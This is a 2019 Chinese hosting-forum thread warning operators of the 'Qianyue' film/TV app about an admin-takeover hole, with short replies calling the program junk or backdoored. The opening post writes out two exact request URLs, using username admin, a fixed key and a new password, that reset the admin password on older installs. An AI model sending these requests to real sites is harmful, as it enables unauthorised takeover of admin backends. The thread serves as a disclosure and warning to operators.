全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1647|回复: 9

[疑问] 千月,影视双端漏洞,在运营的注意了!!

[复制链接]
发表于 2019-6-22 09:38:02 | 显示全部楼层 |阅读模式
发个帖子水一波经验
千月,影视双端漏洞,在运营的注意了!!
前几天已经爆出漏洞利用代码 拿后台!!!


接下来看好了!!
XXXX/login/login/yzcode?username=admin&key=465454&password=123456
复制以上代码
如果出现下面的结果,则表示可以更改
360截图-2347003.jpg (3.56 KB, 下载次数: 1)
接下来
XXXX/login/login/repass?username=admin&key=465454&password=123456
显示
360截图-888675.jpg (5.37 KB, 下载次数: 0)
出现以上结果,则表示,
账户  admin
密码已被更改为123456
拿下
目前爆出来的漏洞适用于旧版本,账户名为admin的
………………
所以,在运营的 如果用户名为admin!!!请马上更改!!!个别有动手能力的 改了安全码的 那就不用了
发表于 2019-6-22 09:40:53 | 显示全部楼层
这是什么辣鸡程序,连登录都有漏洞
发表于 2019-6-22 09:41:57 来自手机 | 显示全部楼层
大佬厉害了
发表于 2019-6-22 09:45:36 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2019-6-22 09:46:52 来自手机 | 显示全部楼层
握草,到处都是后门
发表于 2019-6-22 10:11:51 | 显示全部楼层
垃圾程序,结构不严谨
发表于 2019-6-22 10:13:16 | 显示全部楼层
都忘记了,你不说我还不记得安装过这个,尼玛APP还在虚拟机呢,域名都忘记了。。。。
发表于 2019-6-22 10:25:42 | 显示全部楼层
有个key,说明是故意留下的后门了。。。并不是程序不严谨
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-26 08:39 , Processed in 0.072237 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表